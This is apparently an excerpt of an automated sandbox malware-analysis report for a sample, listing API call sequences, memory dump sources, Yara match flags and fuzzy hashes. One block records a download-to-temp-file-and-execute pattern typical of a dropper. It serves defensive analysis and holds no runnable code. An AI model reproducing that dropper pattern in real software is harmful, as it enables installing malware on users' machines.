                                                                      • _free.LIBCMT ref: 0043A735
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                      • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                                      • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                      • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                      • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                                      • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                      • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                                      APIs
                                                                      • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024A2C7E
                                                                      • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 024A2C94
                                                                      • GetTempPathW.KERNEL32(00000105,?), ref: 024A2CB0
                                                                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 024A2CC6
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 024A2CFF
                                                                      • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 024A2D3B
                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 024A2D58
                                                                      • ShellExecuteExW.SHELL32(?), ref: 024A2DCF
                                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 024A2DE4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                      • String ID: <
                                                                      • API String ID: 838076374-4251816714
                                                                      • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                      • Instruction ID: f8376f39cbc680726627f03fa262cc89ef4a0d57456ea7302e91473f8284e7fa
                                                                      • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                      • Instruction Fuzzy Hash: 24416F7194021DAFEB20DF649C85FEAB7BCFF15705F0080EAA548A2150DFB09E858FA4
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024BF228,00000004,024B7D87,00000004,024B8069), ref: 024BEEF9
                                                                      • GetLastError.KERNEL32(?,024BF228,00000004,024B7D87,00000004,024B8069,?,024B8799,?,00000008,024B800D,00000000,?,?,00000000,?), ref: 024BEF05
                                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,024BF228,00000004,024B7D87,00000004,024B8069,?,024B8799,?,00000008,024B800D,00000000,?,?,00000000), ref: 024BEF15
                                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 024BEF2B
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF41
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF58
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF6F
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF86
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF9D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                      • String ID: advapi32.dll
                                                                      • API String ID: 2340687224-4050573280
                                                                      • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                      • Instruction ID: e46dc29805512aa2a7d94def5fb2338a8fbf836280d4bc568fe59861864f394c
                                                                      • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                      • Instruction Fuzzy Hash: C32151B5904711BFE7116FB49C0CA9ABFA8EF09B16F004A2BF555E3650CBBC94418FA4
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024BF228,00000004,024B7D87,00000004,024B8069), ref: 024BEEF9
                                                                      • GetLastError.KERNEL32(?,024BF228,00000004,024B7D87,00000004,024B8069,?,024B8799,?,00000008,024B800D,00000000,?,?,00000000,?), ref: 024BEF05
                                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,024BF228,00000004,024B7D87,00000004,024B8069,?,024B8799,?,00000008,024B800D,00000000,?,?,00000000), ref: 024BEF15
                                                                      • GetProcAddress.KERNEL32(00000000,00447430), ref: 024BEF2B
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF41
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF58
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF6F
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF86
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 024BEF9D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                      • String ID: advapi32.dll
                                                                      • API String ID: 2340687224-4050573280
                                                                      • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                      • Instruction ID: fbcb92d4f1cdcf818f112b58a3f072f9c3d94ad34d7fafeb73b30db36e63ed71
                                                                      • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                      • Instruction Fuzzy Hash: 192181B1904711BFE7116F649C08A9ABBECEF0AB16F004A2BF555D3600CBBC94418BA8
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024B670B), ref: 024B24B6
                                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024B24C4
                                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024B24D2
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024B670B), ref: 024B2500
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 024B2507
                                                                      • GetLastError.KERNEL32(?,?,?,024B670B), ref: 024B2522
                                                                      • GetLastError.KERNEL32(?,?,?,024B670B), ref: 024B252E
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B2544
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024B2552
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                      • String ID: kernel32.dll
                                                                      • API String ID: 4179531150-1793498882
                                                                      • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                      • Instruction ID: 5a76a6816cae65ec94179f5a20938ee6ff36c2ffc1a2c9e150d9f36bbf03e7b9
                                                                      • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                      • Instruction Fuzzy Hash: 2E11A9795003117FE712BB756C599AB7BAC9D06B12720052BFC01E3251EBB8D5018A7D
                                                                      APIs
                                                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                        • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                      • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                      • String ID: pContext$switchState
                                                                      • API String ID: 3151764488-2660820399
                                                                      • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                      • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                      • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                      • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                      • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                      • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                      • SafeRWList.LIBCONCRT ref: 00419798
                                                                        • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                        • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                      • GetLastError.KERNEL32 ref: 004197B9
                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                      • String ID: eventObject
                                                                      • API String ID: 1999291547-1680012138
                                                                      • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                      • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                      • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                      • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 024C0C36
                                                                      • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024C0C9D
                                                                      • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024C0CBA
                                                                      • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024C0D20
                                                                      • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024C0D35
                                                                      • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024C0D47
                                                                      • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024C0D75
                                                                      • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024C0D80
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024C0DAC
                                                                      • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024C0DBC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                      • String ID:
                                                                      • API String ID: 3720063390-0
                                                                      • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                      • Instruction ID: f6c7ac24383507c5f8fac25afba969d6e0fee31e27b0a149498c89f5997f02a9
                                                                      • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                      • Instruction Fuzzy Hash: 8E41B238A04208DBCF59FFA9C4647EE7766AF41304F2440AFD8065B382CB659A49CF65
                                                                      APIs
                                                                      • _free.LIBCMT ref: 024D2061
                                                                        • Part of subcall function 024D36D1: HeapFree.KERNEL32(00000000,00000000,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?), ref: 024D36E7
                                                                        • Part of subcall function 024D36D1: GetLastError.KERNEL32(?,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?,?), ref: 024D36F9
                                                                      • _free.LIBCMT ref: 024D206D
                                                                      • _free.LIBCMT ref: 024D2078
                                                                      • _free.LIBCMT ref: 024D2083
                                                                      • _free.LIBCMT ref: 024D208E
                                                                      • _free.LIBCMT ref: 024D2099
                                                                      • _free.LIBCMT ref: 024D20A4
                                                                      • _free.LIBCMT ref: 024D20AF
                                                                      • _free.LIBCMT ref: 024D20BA
                                                                      • _free.LIBCMT ref: 024D20C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                      • Instruction ID: 7942f0cd5f710d0925f306420f540038bf5271a78530a62ebfb61803e0bb5e45
                                                                      • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                      • Instruction Fuzzy Hash: 1B11747A600108AFCB51EF56D851CD93FA6EF04750B5140AAFE098F221DB71EE60DF81
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00431DFA
                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                      • _free.LIBCMT ref: 00431E06
                                                                      • _free.LIBCMT ref: 00431E11
                                                                      • _free.LIBCMT ref: 00431E1C
                                                                      • _free.LIBCMT ref: 00431E27
                                                                      • _free.LIBCMT ref: 00431E32
                                                                      • _free.LIBCMT ref: 00431E3D
                                                                      • _free.LIBCMT ref: 00431E48
                                                                      • _free.LIBCMT ref: 00431E53
                                                                      • _free.LIBCMT ref: 00431E61
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                      • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                                      • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                      • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: __cftoe
                                                                      • String ID: F(@$F(@
                                                                      • API String ID: 4189289331-2038261262
                                                                      • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                      • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                                      • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                      • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                                      APIs
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: DecodePointer
                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                      • API String ID: 3527080286-3064271455
                                                                      • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                      • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                                      • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                      • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                      • Instruction ID: 1609fa7863bffdc7a6b1b616fe6d56ae7ac17a1dcbcf0e8ee8e2630e84b7099b
                                                                      • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                      • Instruction Fuzzy Hash: 88C1C374E04249AFDF11DFA9C864BAEBFB1AF0A314F1441DAE414AB391C774A941CF62
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: fB$csm
                                                                      • API String ID: 1170836740-1586063737
                                                                      • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                      • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                                      • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                      • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                                      APIs
                                                                      • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                                      • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                                      • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                                      • PMDtoOffset.LIBCMT ref: 00428D4F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: FindInstanceTargetType$Offset
                                                                      • String ID: Bad dynamic_cast!
                                                                      • API String ID: 1467055271-2956939130
                                                                      • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                      • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                                      • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                      • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                                      APIs
                                                                      • atomic_compare_exchange.LIBCONCRT ref: 024BC6DC
                                                                      • atomic_compare_exchange.LIBCONCRT ref: 024BC700
                                                                      • std::_Cnd_initX.LIBCPMT ref: 024BC711
                                                                      • std::_Cnd_initX.LIBCPMT ref: 024BC71F
                                                                        • Part of subcall function 024A1370: __Mtx_unlock.LIBCPMT ref: 024A1377
                                                                      • std::_Cnd_initX.LIBCPMT ref: 024BC72F
                                                                        • Part of subcall function 024BC3EF: __Cnd_broadcast.LIBCPMT ref: 024BC3F6
                                                                      • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 024BC73D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                      • String ID: t#D
                                                                      • API String ID: 4258476935-1671555958
                                                                      • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                      • Instruction ID: acce132dbf25cdd8ec706ff4b7ca29d13aa24df6e014fd855d7064df9005ee6e
                                                                      • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                      • Instruction Fuzzy Hash: 8B01F771900605ABDB12BB66CDC4BDEB35AAF04310F14001BE90597680DBB4EA158FA2
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                      • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                      • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                      • __freea.LIBCMT ref: 0043231B
                                                                        • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                      • __freea.LIBCMT ref: 00432324
                                                                      • __freea.LIBCMT ref: 00432349
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 3864826663-0
                                                                      • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                      • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                      • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                      • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                      APIs
                                                                        • Part of subcall function 024D2141: GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
                                                                        • Part of subcall function 024D2141: _free.LIBCMT ref: 024D2178
                                                                        • Part of subcall function 024D2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9
                                                                      • _free.LIBCMT ref: 024D1444
                                                                      • _free.LIBCMT ref: 024D145D
                                                                      • _free.LIBCMT ref: 024D148F
                                                                      • _free.LIBCMT ref: 024D1498
                                                                      • _free.LIBCMT ref: 024D14A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorLast
                                                                      • String ID: C
                                                                      • API String ID: 3291180501-1037565863
                                                                      • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                      • Instruction ID: c86c8648aada7789ed40359bdd35dab84400f3d1f4258a12614e4e455f562939
                                                                      • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                      • Instruction Fuzzy Hash: 97B12775A012199FDB24DF19C894BAEB7B5FB08704F1486AEE84DA7350D771AE90CF40
                                                                      APIs
                                                                      Memory Dump Source
